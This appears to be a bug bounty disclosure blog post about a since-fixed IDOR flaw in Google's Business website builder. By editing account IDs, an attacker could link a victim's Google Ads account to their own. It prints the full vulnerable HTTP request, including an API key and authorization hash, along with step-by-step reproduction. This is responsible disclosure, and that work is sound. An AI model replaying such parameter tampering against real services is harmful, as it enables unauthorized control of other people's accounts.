Google : Link any Google Ads account to Business website builder account [IDOR]
Company Information :
Google LLC is an American multinational technology company focusing on artificial intelligence, online advertising, search engine technology, cloud computing, computer software, quantum computing, e-commerce, and consumer electronics.
Target Information :
Google My Business
URL: https://businesswebsites.
Technical Details of the Bug :
On https://businesswebsites.
Adding Google Ads account to business website account request is vulnerable to IDOR Attack which leads to add any Google ads account to your business website builder account .
From business Account whatever additional/modification you do , that reflects on Google Ads account.
Vulnerable HTTP Request :
```POST /batch?%24ct=multipart% 2Fmixed%3B%20boundary% 3Dbatch1154312906248708848 HTTP/2
Host: cookies
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=UTF-8
Content-Length: 911
Origin: https://businesswebsites. google.com
Dnt: 1
Referer: https://businesswebsites. google.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
--batch1154312906248708848
Content-Type: application/http
Content-Transfer-Encoding: binary
Content-ID: <batch1154312906248708848+ gapiRequest@googleapis.com>```
```POST /v1/merchants/ 2722896777401254439/ linkadsaccount?adwordsAccount. id=3444508223&adwordsAccount. internalId=1218875477& adwordsAccount. obfuscatedInternalId= 6643565184743831098& merchantNamespace=PLP& obfuscatedMerchantId= 2722896777401254439&key= AIzaSyB-D_YlkvS9aPKnLtTLq- LmP134EUEYAig
X-JavaScript-User-Agent: google-api-javascript-client/ 1.1.0
X-Requested-With: XMLHttpRequest
X-Goog-Encode-Response-If- Executable: base64
X-Goog-AuthUser: 0
Authorization: SAPISIDHASH 1679787814_ 461b6fb16b8f34e98b6490b0de7c99 d24dca0e36
X-ClientDetails: appVersion=5.0%20(Macintosh)& platform=MacIntel&userAgent= Mozilla%2F5.0%20(Macintosh%3B% 20Intel%20Mac%20OS%20X%2010. 14%3B%20rv%3A109.0)%20Gecko%2F20100101%20Firefox%2F111.0
--batch1154312906248708848--
```
Vulnerable parameters:
adwordsAccount.id
adwordsAccount.internalId
adwordsAccount. obfuscatedInternalIdSteps To Reproduce:
1.Login from Victim Business website builder account from https://businesswebsites.
2.Now go to settings and you will see Google Ads account section.
3.Click on link the account and intercept the request.
4.You will notice the above mentioned request.
5.Drop the request and capture all 3 IDs mentioned above.
6.Now login from Attacker account and go to settings -- Google Ads .
7.Connect your Google Ads account and intercept the request.
8.Change adwordsAccount.id,
9.Send the Request to server and you will notice that victim Google Ads account will be connected to Attacker Business website builder account.
10.Now Whatever changes attacker does , will reflect on Victim Google Ads account.
Impact :
[IDOR] -- Link any Google Ads account to Business website builder account on https://businesswebsites.
Timeline :
March 27th 2023: Report send to Google product Security Team through Portal.
March 29th 2023 : Report Accepted and Triaged.
June 13th 2023 : Complete issue was resolved and confirmed.
June 13th 2023 : 500$ Bounty Rewarded

Comments
Post a Comment